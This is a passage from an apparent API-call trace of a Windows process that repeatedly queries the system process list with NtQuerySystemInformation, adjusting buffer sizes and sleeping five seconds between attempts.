BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.384] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.393] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.403] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.410] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.418] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.426] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.458] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.478] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.493] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.502] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.512] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.520] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.530] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.549] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.558] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.567] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.575] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.583] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.586] NtQuerySystemInformation (in: 